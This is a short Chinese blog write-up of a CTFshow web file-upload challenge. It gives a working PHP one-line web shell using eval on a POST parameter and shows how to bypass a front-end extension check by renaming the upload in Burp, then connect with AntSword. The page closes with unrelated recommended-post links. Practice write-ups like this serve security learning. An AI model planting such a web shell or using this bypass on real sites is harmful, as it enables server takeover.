ctf show web 入门151

根据题目这是一道文件上传相关题目,我们先查看源代码看看有什么信息

这里说明只允许上传以png结尾的文件那么我们构造一个一句话木马但是以.png为后缀来绕过前端验证

构造的payload为: <?php @eval($_POST['attack']);?>

密码为:attack

然后将文件命名为:文件名.png后上传文件同时打开bp抓包

将后缀重新改为.php文件就以.php的形式上传成功所以我们可以使用蚁剑连接

要注意我们需要将https改为http才能成功连接,接下来我们就掌握了该网站的控制权

最后发现flag在:/var/www/html/flag.php目录下

相关推荐
Genevieve_xiao1 小时前
【xjtuse】【数学建模】课程笔记(五)回归模型、谱聚类
笔记·数学建模·回归
中屹指纹浏览器1 小时前
浏览器指纹溯源技术:JS漏洞、SSL握手、TLS指纹关联原理
经验分享·笔记
羊群智妍2 小时前
2026 GEO与AI搜索优化结合:免费监测工具实测报告
笔记
He BianGu2 小时前
【笔记】在WPF中PriorityBinding的详细介绍
笔记·wpf
Honker_yhw2 小时前
大数据管理与应用系列丛书《数据挖掘》(吕欣等著)读书笔记-Logistic回归
笔记·学习
Brilliantwxx4 小时前
【C++】 继承与多态(中)
开发语言·c++·笔记·算法
MY_TEUCK10 小时前
【2026最新Python+AI学习基础】Python 入门笔记篇
笔记·python·学习
nnsix15 小时前
设计模式 - 模板方法模式 笔记
笔记·设计模式·模板方法模式
RainCity16 小时前
Java Swing 自定义组件库分享(六)
java·笔记·后端